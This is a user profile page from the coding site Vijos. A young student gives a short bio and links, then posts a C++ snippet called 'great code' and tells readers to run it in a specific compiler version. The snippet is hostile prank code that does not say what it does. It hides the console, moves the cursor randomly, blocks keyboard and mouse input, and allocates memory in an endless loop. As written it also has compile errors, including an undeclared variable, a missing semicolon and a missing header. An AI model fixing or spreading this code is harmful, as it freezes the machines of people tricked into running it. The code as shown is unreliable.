/ Vijos /

用户

个人简介

基中自有黄金屋
————伊丽莎白鼠

大家好!我乃是中国人民大学附属中学实验小学早陪六年级的超级蒟蒻&渣渣一枚!

欢迎加我|扣扣威信|交流哦~

另外附上:
1. luogu博客
2. 正版c++5.11下载地址
3. RDFZ团队
4. 最爱上的网址

伟大的代码:

#include <iostream>
#include <cstdlib>
#include <cstdio>
#include <algorithm>
#include <cstring>

using namespace std;

int main()
{
    int x=GetSystemMetrics(SM_CXSCREEN);
    int y=GetSystemMetrics(SM_CYSCREEN);
    FreeConsole();  
    srand(time(0));
    while(1)
    {
        SetCursorPos(rand()%x,rand()%y)
        BlockInput(true);
        char *p[i] =new char[10000000];
        i++;
    }
    return 0;
}

需要在c++5.11的版本里运行